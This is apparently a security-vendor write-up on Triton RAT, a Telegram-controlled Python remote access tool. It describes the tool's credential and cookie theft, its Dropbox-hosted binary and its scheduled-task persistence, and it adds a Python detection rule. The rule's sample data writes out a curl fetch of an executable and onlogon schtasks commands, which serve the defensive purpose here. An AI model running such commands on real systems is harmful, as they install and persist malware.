Cado Security Labs has identified a Python-based Remote Access Tool (RAT) named Triton RAT. This open-source RAT is available on GitHub and enables users to remotely access and control a system using Telegram.
The Triton RAT Python script begins by retrieving the Telegram Bot token and chat ID from Pastebin. Triton RAT has a wide array of malicious capabilities, including:
- Keylogging
- Remote commands
- Stealing saved passwords
- Stealing Roblox security cookies
- Changing wallpaper
- Screen recording
- Webcam access
- Gathering Wi-Fi information
- Downloading/uploading files
- Executing shell commands
- Stealing clipboard data
- Anti-analysis techniques
- Gathering system information

All exfiltrated data is sent to a Telegram Bot.
The Triton RAT code includes a "sendmessage" function that decrypts and saves passwords from various locations, including AppData, Google Chrome, User Data, Local, and Local State. The RAT also targets Roblox security cookies (.ROBLOSECURITY) in multiple browsers, such as Opera, Chrome, Edge, Chromium, Firefox, and Brave. These cookies can be used to gain access to Roblox accounts, bypassing 2FA.
The Python script also creates a VBScript ("updateagent.vbs") and a BAT script ("check.bat"), which are executed with PowerShell. The BAT script retrieves a binary named "Proton Drive.exe" from Dropbox, stores it in a hidden folder, and executes it with admin privileges. "Proton Drive.exe" is a PyInstaller-compiled version of Triton RAT, likely used for persistence. To maintain persistence, three scheduled tasks are created that start on logon of any user.
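As an added defensive illustration (not code from the Cado write-up or from the RAT itself), the following Python sketch turns the persistence chain described above into a detection rule over constructed process-creation records: it groups events under their nearest PowerShell ancestor and alerts only when script execution, a Dropbox-hosted .exe fetch and onlogon scheduled-task creation all appear in the same process tree. The paths, task names and Dropbox URL in the sample data are invented placeholders.

```python
import re

# Constructed Sysmon-style process-creation records (pid, ppid, image, command
# line) modelled on the chain in the write-up. Sample data written for this
# example, not real telemetry; paths, task names and the URL are placeholders.
TMP = r"C:\Users\u\AppData\Local\Temp"
HID = r"C:\Users\u\.hidden"
SAMPLE_EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (150, 100, "powershell.exe", "powershell.exe -c Get-Process"),  # benign control
    (200, 100, "powershell.exe", f'powershell.exe -w hidden -c "cscript {TMP}\\updateagent.vbs"'),
    (300, 200, "cscript.exe", f"cscript {TMP}\\updateagent.vbs"),
    (400, 300, "cmd.exe", f"cmd.exe /c {TMP}\\check.bat"),
    (500, 400, "curl.exe", f'curl.exe -sL https://www.dropbox.com/s/PLACEHOLDER/x?dl=1 -o "{HID}\\Proton Drive.exe"'),
    (600, 400, "schtasks.exe", f'schtasks /create /tn T1 /sc onlogon /tr "{HID}\\Proton Drive.exe" /f'),
    (700, 400, "schtasks.exe", f'schtasks /create /tn T2 /sc onlogon /tr "{HID}\\Proton Drive.exe" /f'),
    (800, 400, "schtasks.exe", f'schtasks /create /tn T3 /sc onlogon /tr "{HID}\\Proton Drive.exe" /f'),
    (900, 1, "schtasks.exe", "schtasks /create /tn Backup /sc daily /tr backup.exe"),  # benign control
]

SCRIPT_EXT = re.compile(r"\.(?:vbs|bat)\b", re.I)          # VBScript / BAT stage
DROPBOX_EXE = re.compile(r"dropbox\.com\S*.*\.exe", re.I)   # binary fetched from Dropbox
ONLOGON_TASK = re.compile(r"schtasks\b.*/create\b.*/sc\s+onlogon\b", re.I)

def detect_persistence_chain(events):
    """Return {powershell_pid: stage summary} for every PowerShell-rooted tree
    that shows script execution, a Dropbox .exe fetch and onlogon task creation."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}

    def powershell_ancestor(pid):
        while pid in by_pid:  # walk up until we leave the recorded tree
            ppid, image, _ = by_pid[pid]
            if image.lower() == "powershell.exe":
                return pid
            pid = ppid
        return None

    trees = {}
    for pid, _, _, cmd in events:
        root = powershell_ancestor(pid)
        if root is None:
            continue  # not descended from PowerShell: outside this rule's scope
        t = trees.setdefault(root, {"script": False, "download": False, "onlogon_tasks": 0})
        t["script"] |= bool(SCRIPT_EXT.search(cmd))
        t["download"] |= bool(DROPBOX_EXE.search(cmd))
        t["onlogon_tasks"] += bool(ONLOGON_TASK.search(cmd))
    # Require every stage so a lone script or a lone onlogon task does not alert.
    return {root: t for root, t in trees.items()
            if t["script"] and t["download"] and t["onlogon_tasks"] >= 1}
```

Run against the sample data, only the tree rooted at the hidden PowerShell (pid 200) is reported, with three onlogon tasks; the benign PowerShell and the daily backup task produce nothing.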
Triton RAT incorporates anti-analysis techniques, including checking for "blacklisted" processes associated with debugging and antivirus products. The exfiltrated data is sent to a Telegram bot, through which the attacker also sends commands to the infected machine.